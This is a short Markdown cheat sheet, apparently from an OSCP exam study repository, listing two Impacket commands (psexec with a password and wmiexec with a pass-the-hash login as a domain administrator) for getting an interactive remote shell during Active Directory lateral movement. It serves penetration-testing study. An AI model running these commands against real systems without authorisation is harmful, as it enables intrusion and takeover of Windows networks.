Files
oscp/Windows/Active Directory for OSCP/Lateral Movement/Interactive Shell.md
T
2025-11-21 17:17:42 +01:00

6 lines
120 B
Markdown

```sh
impacket-psexec <domain>/<user>:<password>@<ip>
impacket-wmiexec -hashes <hash> htb.local/administrator@<ip>
```